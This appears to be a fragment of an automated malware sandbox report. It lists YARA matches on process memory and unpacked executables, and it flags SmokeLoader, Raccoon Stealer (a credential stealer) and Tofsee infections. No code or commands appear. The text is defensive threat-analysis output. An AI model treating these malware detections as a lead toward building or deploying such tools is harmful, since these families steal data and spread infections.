Source: Yara match File source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.588446191.0000000001030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.649232552.0000000001212000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.644471318.0000000000BB3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8433.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs